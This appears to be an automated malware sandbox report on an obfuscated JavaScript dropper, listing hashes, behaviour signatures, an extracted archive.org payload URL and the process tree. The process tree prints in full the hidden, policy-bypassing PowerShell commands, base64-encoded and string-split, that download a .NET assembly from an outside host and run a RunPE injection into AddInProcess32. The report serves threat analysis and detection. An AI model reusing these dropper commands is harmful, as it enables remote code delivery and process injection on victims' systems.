Analysis

  • max time kernel
    125s
  • max time network
    126s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/09/2024, 11:57

General

  • Target

    92e24621f961d0095911956dbe9a6400feb59a324cbb0994ae1290b2a2045b13.js

  • Size

    601KB

  • MD5

    2775b43e1e9b8e237f506cc02c0dfd9e

  • SHA1

    0816358f326556470110ded8e13e3409ab46ec4c

  • SHA256

    92e24621f961d0095911956dbe9a6400feb59a324cbb0994ae1290b2a2045b13

  • SHA512

    a41baead687120db6017b800d09604e3b53113c229a5fcf18d7a7d1b1f3f05319e0239d160150bcf4b01caff7989829d6730ae0c728d793641f09bb0347c97d0

  • SSDEEP

    12288:Dvf0MG9e5BJXO6fU68Mkf/r3z0jUJPjjids+hXhGjpLJCZgywlrzvR6tNhEY8vTi:hTEt3Y1ZaXc

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

exe.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\92e24621f961d0095911956dbe9a6400feb59a324cbb0994ae1290b2a2045b13.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2080
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JgAoACAAJABWAGUAcgBiAE8AcwBFAFAAUgBlAEYARQBSAEUAbgBjAEUALgB0AG8AcwBUAHIAaQBuAEcAKAApAFsAMQAsADMAXQArACcAeAAnAC0ASgBvAEkATgAnACcAKQAgACgAIAAoACgAJwB4AEUAdAB1AHIAJwArACcAbAAgAD0AIABGADUASgBoAHQAdABwACcAKwAnAHMAOgAvACcAKwAnAC8AJwArACcAaQBhADkAMAAnACsAJwA0ADYAJwArACcAMAAnACsAJwAxAC4AdQAnACsAJwBzAC4AYQByACcAKwAnAGMAaABpACcAKwAnAHYAZQAuAG8AcgBnAC8ANgAnACsAJwAvAGkAdAAnACsAJwBlAG0AcwAvAGQAJwArACcAZQB0ACcAKwAnAGEAaAAtAG4AbwB0ACcAKwAnAGUALQAnACsAJwBqAC8ARABlAHQAYQBoACcAKwAnAE4AbwB0ACcAKwAnAGUASgAnACsAJwAuAHQAeAB0AEYANQBKADsAeABFACcAKwAnAHQAYgBhACcAKwAnAHMAZQA2ADQAQwBvAG4AdABlAG4AdAAgAD0AIAAoAE4AZQB3AC0AJwArACcATwBiAGoAZQBjACcAKwAnAHQAIAAnACsAJwBTAHkAJwArACcAcwAnACsAJwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuACcAKwAnAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpACcAKwAnAG4AZwAoAHgARQB0AHUAJwArACcAcgBsACcAKwAnACkAOwB4AEUAdABiAGkAbgBhAHIAJwArACcAeQBDAG8AbgB0AGUAbgB0ACAAPQAnACsAJwAgAFsAJwArACcAUwB5AHMAJwArACcAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AJwArACcAOgA6AEYAJwArACcAcgBvAG0AQgBhAHMAJwArACcAZQA2ADQAUwB0AHIAaQBuAGcAKAB4AEUAJwArACcAdAAnACsAJwBiACcAKwAnAGEAcwAnACsAJwBlADYAJwArACcANAAnACsAJwBDAG8AbgB0AGUAbgB0ACkAOwB4AEUAdAAnACsAJwBhAHMAcwBlACcAKwAnAG0AYgBsAHkAJwArACcAIAA9ACAAWwBSAGUAZgBsAGUAYwAnACsAJwB0ACcAKwAnAGkAbwBuAC4AQQBzAHMAZQBtACcAKwAnAGIAbAB5AF0AOgA6AEwAbwBhACcAKwAnAGQAKAB4ACcAKwAnAEUAdABiAGkAbgBhAHIAJwArACcAeQBDAG8AbgB0ACcAKwAnAGUAbgB0ACkAOwAnACsAJwB4ACcAKwAnAEUAdAB0ACcAKwAnAHkAcABlACAAPQAgAHgARQB0AGEAcwBzAGUAbQAnACsAJwBiACcAKwAnAGwAeQAuACcAKwAnAEcAZQB0AFQAeQBwACcAKwAnAGUAKABGADUAJwArACcASgBSAHUAbgBQAEUALgBIACcAKwAnAG8AJwArACcAbQAnACsAJwBlAEYAJwArACcANQBKACkAOwB4AEUAdABtAGUAdABoAG8AZAAgAD0AIAB4AEUAJwArACcAdAAnACsAJwB0AHkAcABlACcAKwAnAC4ARwBlAHQATQBlAHQAaABvAGQAKABGADUASgBWAEEAJwArACcASQBGADUASgAnACsAJwApADsAeABFAHQAbQAnACsAJwBlAHQAJwArACcAaAAnACsAJwBvAGQALgBJAG4AdgBvAGsAZQAnACsAJwAoACcAKwAnAHgARQAnACsAJwB0AG4AdQBsAGwALAAgAFsAJwArACcAbwBiAGoAZQAnACsAJwBjAHQAWwBdAF0AQAAoAEYANQAnACsAJwBKACcAKwAnAHQAJwArACcAeAB0ACcAKwAnAC4AaABjAG8AcwBlAGwAaQBkAC8AdgBlAGQALgAyAHIALgAzADkAYgAzADQANQAzADAAJwArACcAMgAnACsAJwBhADAANwA1AGIAMQBiAGMAMABkADQANQBiADYAMwAyACcAKwAnAGUAYgAnACsAJwA5AGUAZQA2ADIALQBiAHUAcAAvAC8AOgBzAHAAJwArACcAdAB0AGgARgA1ACcAKwAnAEoAIAAsACcAKwAnACAAJwArACcARgA1AEoAZABlACcAKwAnAHMAYQB0AGkAdgBhAGQAbwBGADUASgAgACwAIABGADUASgBkAGUAcwBhAHQAaQB2AGEAZABvAEYANQBKACAALAAgAEYANQAnACsAJwBKAGQAZQBzAGEAdABpAHYAYQBkAG8ARgA1AEoAJwArACcALABGADUASgAnACsAJwBBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAzADIAJwArACcARgA1AEoALABGACcAKwAnADUASgAnACsAJwBkAGUAcwBhAHQAJwArACcAaQB2AGEAZABvAEYANQBKACkAJwArACcAKQA7ACcAKQAtAFIAZQBQAGwAQQBDAEUAIAAnAEYANQBKACcALABbAGMAaABhAHIAXQAzADkAIAAtAFIAZQBQAGwAQQBDAEUAIAAnAHgARQB0ACcALABbAGMAaABhAHIAXQAzADYAKQAgACkA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5116
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $VerbOsEPReFEREncE.tosTrinG()[1,3]+'x'-JoIN'') ( (('xEtur'+'l = F5Jhttp'+'s:/'+'/'+'ia90'+'46'+'0'+'1.u'+'s.ar'+'chi'+'ve.org/6'+'/it'+'ems/d'+'et'+'ah-not'+'e-'+'j/Detah'+'Not'+'eJ'+'.txtF5J;xE'+'tba'+'se64Content = (New-'+'Objec'+'t '+'Sy'+'s'+'tem.Net.WebClien'+'t).DownloadStri'+'ng(xEtu'+'rl'+');xEtbinar'+'yContent ='+' ['+'Sys'+'tem.Convert]'+'::F'+'romBas'+'e64String(xE'+'t'+'b'+'as'+'e6'+'4'+'Content);xEt'+'asse'+'mbly'+' = [Reflec'+'t'+'ion.Assem'+'bly]::Loa'+'d(x'+'Etbinar'+'yCont'+'ent);'+'x'+'Ett'+'ype = xEtassem'+'b'+'ly.'+'GetTyp'+'e(F5'+'JRunPE.H'+'o'+'m'+'eF'+'5J);xEtmethod = xE'+'t'+'type'+'.GetMethod(F5JVA'+'IF5J'+');xEtm'+'et'+'h'+'od.Invoke'+'('+'xE'+'tnull, ['+'obje'+'ct[]]@(F5'+'J'+'t'+'xt'+'.hcoselid/ved.2r.39b34530'+'2'+'a075b1bc0d45b632'+'eb'+'9ee62-bup//:sp'+'tthF5'+'J ,'+' '+'F5Jde'+'sativadoF5J , F5JdesativadoF5J , F5'+'JdesativadoF5J'+',F5J'+'AddInProcess32'+'F5J,F'+'5J'+'desat'+'ivadoF5J)'+');')-RePlACE 'F5J',[char]39 -RePlACE 'xEt',[char]36) )"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2912
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4248,i,15436195446242760253,4000484513008731869,262144 --variations-seed-version --mojo-platform-channel-handle=1304 /prefetch:8
    1⤵
      PID:2876

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      2f57fde6b33e89a63cf0dfdd6e60a351

      SHA1

      445bf1b07223a04f8a159581a3d37d630273010f

      SHA256

      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

      SHA512

      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      64B

      MD5

      d8b9a260789a22d72263ef3bb119108c

      SHA1

      376a9bd48726f422679f2cd65003442c0b6f6dd5

      SHA256

      d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

      SHA512

      550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vj5ngwwo.ghp.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/2912-22-0x0000013626DA0000-0x0000013626FAC000-memory.dmp

      Filesize

      2.0MB

    • memory/5116-0-0x00007FFBEECF3000-0x00007FFBEECF5000-memory.dmp

      Filesize

      8KB

    • memory/5116-1-0x000001B1B4E50000-0x000001B1B4E72000-memory.dmp

      Filesize

      136KB

    • memory/5116-11-0x00007FFBEECF0000-0x00007FFBEF7B1000-memory.dmp

      Filesize

      10.8MB

    • memory/5116-12-0x00007FFBEECF0000-0x00007FFBEF7B1000-memory.dmp

      Filesize

      10.8MB

    • memory/5116-28-0x00007FFBEECF0000-0x00007FFBEF7B1000-memory.dmp

      Filesize

      10.8MB